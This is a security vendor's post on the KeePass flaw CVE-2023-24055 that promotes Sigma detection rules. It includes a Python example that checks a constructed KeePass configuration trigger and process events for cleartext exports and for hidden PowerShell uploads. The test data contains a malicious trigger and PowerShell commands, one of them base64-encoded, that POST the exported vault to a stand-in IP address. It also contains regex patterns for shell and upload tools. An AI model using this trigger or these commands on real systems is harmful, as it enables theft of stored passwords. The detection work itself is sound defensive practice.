Stay alert! Security researchers have disclosed a vulnerability posing a serious threat to users of the popular password manager KeePass. The flaw, tracked as CVE-2023-24055, may affect KeePass 2.5x versions and can allow attackers to obtain stored passwords in cleartext: an attacker who can write to the KeePass configuration file (KeePass.config.xml) can plant a trigger that silently exports the whole database in an unencrypted format the next time it is unlocked. With a proof-of-concept (PoC) exploit publicly available, and given that KeePass is one of the most popular password managers globally, this security flaw is a juicy target for attackers.

To proactively detect malicious activity associated with CVE-2023-24055 exploitation, SOC Prime’s Detection as Code Platform offers a batch of dedicated Sigma rules:

Possible KeePass Exploitation Patterns (via cmdline)
Possible KeePass Exploitation Patterns (via powershell)

Both rules above detect exploitation patterns related to the KeePass vulnerability in the spotlight and are based on the CVE-2023-24055 PoC exploit code. Note that adversaries may modify this code to evade detection and proceed with the attack while flying under the radar.

Also, to detect malicious activity associated with potential CVE-2023-24055 exploitation, the SOC Prime Team highly recommends applying the detection rules listed below:

The Possibility of Execution Through Hidden PowerShell Command Lines (via cmdline)
Suspicious Powershell Strings (via powershell)
Call Suspicious.

The detections are compatible with 22 SIEM, EDR, and XDR platforms and are aligned with the MITRE ATT&CK® framework v12, addressing the Credential Access and Exfiltration tactics, with Credentials from Password Stores (T1555) and Exfiltration Over Web Service (T1567) as the corresponding techniques.
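As an added example (written for this page; it is not SOC Prime's rule content and not the Sigma logic behind the rules named above), the Python below sketches what "via cmdline" and "via powershell" detection of this exploitation chain amounts to. It checks two things: a KeePass.config.xml trigger section for actions that export in a cleartext format or spawn a shell (the artefact the PoC plants), and Sysmon-style process-creation events for a hidden or encoded PowerShell that uploads a file to a web service (T1567) in KeePass context. All inputs are constructed: the config layout is a simplified approximation of KeePass's trigger XML (the per-action TypeGuids are omitted, and matching is done on action parameters instead), and the paths, trigger names and IP address are made up.

```python
"""Added example (not SOC Prime's rules): toy Sigma-style checks for the
CVE-2023-24055 chain, run over constructed inputs.
  1) a KeePass.config.xml trigger that exports the database in cleartext
     and/or launches a shell (what the PoC plants);
  2) process-creation events where a hidden/encoded PowerShell ships the
     export to a web service (T1567) in KeePass context.
"""
import base64
import re
import xml.etree.ElementTree as ET

# Constructed config fragment shaped like the PoC trigger. Real triggers also
# carry base64 TypeGuids per action; they are omitted here (assumption: we key
# on the action parameters, which the PoC must set to an export path, an
# export format and a PowerShell command line). Paths and IPs are made up.
CONSTRUCTED_CONFIG = """<Configuration><Application><TriggerSystem><Triggers>
  <Trigger>
    <Name>Windows Update</Name>
    <Events><Event><Parameters><Parameter>0</Parameter><Parameter /></Parameters></Event></Events>
    <Actions>
      <Action><Parameters>
        <Parameter>C:\\Users\\Public\\export.xml</Parameter>
        <Parameter>KeePass XML (2.x)</Parameter>
      </Parameters></Action>
      <Action><Parameters>
        <Parameter>PowerShell.exe</Parameter>
        <Parameter>-WindowStyle Hidden -c "Invoke-WebRequest -Uri http://198.51.100.7/up -Method POST -InFile C:\\Users\\Public\\export.xml"</Parameter>
      </Parameters></Action>
    </Actions>
  </Trigger>
  <Trigger>
    <Name>Nightly backup</Name>
    <Actions><Action><Parameters>
      <Parameter>C:\\Backups\\vault.kdbx</Parameter>
      <Parameter>KeePass KDBX (2.x)</Parameter>
    </Parameters></Action></Actions>
  </Trigger>
</Triggers></TriggerSystem></Application></Configuration>"""

CLEARTEXT_FORMATS = ("keepass xml", "csv", "html")   # export formats that dump secrets unencrypted
SHELL_RE = re.compile(r"powershell|pwsh|cmd\.exe|curl|wget", re.I)


def suspicious_triggers(config_xml):
    """Names of triggers whose actions export in a cleartext format or spawn a shell."""
    hits = []
    for trig in ET.fromstring(config_xml).iter("Trigger"):
        params = " ".join((p.text or "") for p in trig.iter("Parameter"))
        if any(f in params.lower() for f in CLEARTEXT_FORMATS) or SHELL_RE.search(params):
            hits.append(trig.findtext("Name", default="<unnamed>"))
    return hits


def _enc(script):
    """PowerShell -EncodedCommand takes base64 of the UTF-16LE script."""
    return base64.b64encode(script.encode("utf-16le")).decode()


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CONSTRUCTED_PROCESS_EVENTS = [  # Sysmon Event ID 1 style, constructed
    {"ParentImage": r"C:\Program Files\KeePass Password Safe 2\KeePass.exe", "Image": PS,
     "CommandLine": 'PowerShell.exe -WindowStyle Hidden -c "Invoke-WebRequest -Uri http://198.51.100.7/up '
                    '-Method POST -InFile C:\\Users\\Public\\export.xml"'},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": r"powershell.exe -NoProfile -File C:\scripts\inventory.ps1"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": PS,  # KeePass context only visible after decoding
     "CommandLine": "powershell -w hidden -enc " + _enc(
         r"Invoke-RestMethod -Uri http://198.51.100.7/up -Method Post -InFile C:\Users\Public\keepass_export.xml")},
]

HIDDEN_RE = re.compile(r"-w(?:in(?:dowstyle)?)?\s+hidden|-e(?:nc|ncodedcommand|c)?\s+[A-Za-z0-9+/=]{20,}", re.I)
ENC_RE = re.compile(r"-e(?:nc|ncodedcommand|c)?\s+([A-Za-z0-9+/=]{20,})", re.I)
WEB_RE = re.compile(r"invoke-webrequest|invoke-restmethod|\biwr\b|\birm\b|\bcurl\b|\bwget\b|net\.webclient", re.I)
UPLOAD_RE = re.compile(r"-method\s+post|-infile|-body|uploadfile|uploadstring", re.I)
KEEPASS_RE = re.compile(r"keepass|\.kdbx", re.I)


def decode_encoded_command(cmdline):
    """Append the decoded -enc payload so detections see the real script, the way
    script-block logging (the 'via powershell' source) would."""
    m = ENC_RE.search(cmdline)
    if not m:
        return cmdline
    try:
        return cmdline + " " + base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return cmdline


def hidden_powershell(event):
    """PowerShell host started with a hidden window or an encoded command."""
    return event["Image"].lower().endswith(("powershell.exe", "pwsh.exe")) \
        and bool(HIDDEN_RE.search(event["CommandLine"]))


def keepass_exfil(event):
    """Upload to a web service (T1567) either spawned by KeePass.exe or referencing
    KeePass artefacts, evaluated after expanding any encoded command."""
    text = decode_encoded_command(event["CommandLine"])
    in_context = event["ParentImage"].lower().endswith("keepass.exe") or KEEPASS_RE.search(text)
    return bool(in_context and WEB_RE.search(text) and UPLOAD_RE.search(text))


def run_rules(events):
    """(parent process name, hidden-PowerShell hit, KeePass-exfil hit) per event."""
    return [(e["ParentImage"].rsplit("\\", 1)[-1], hidden_powershell(e), keepass_exfil(e)) for e in events]


if __name__ == "__main__":
    print("suspicious triggers:", suspicious_triggers(CONSTRUCTED_CONFIG))
    for row in run_rules(CONSTRUCTED_PROCESS_EVENTS):
        print(row)
```

The third constructed event illustrates the caveat above about modified PoC code: the launching process is cmd.exe rather than KeePass.exe and the script is base64-encoded, so a command-line match on the literal PoC strings would miss it, while decoding the -enc payload before matching still reveals the KeePass export being posted. Inspecting the trigger section of the configuration file, as the first check does, catches the plant before any export or process spawn happens at all, which is the earliest point in this chain a defender can act.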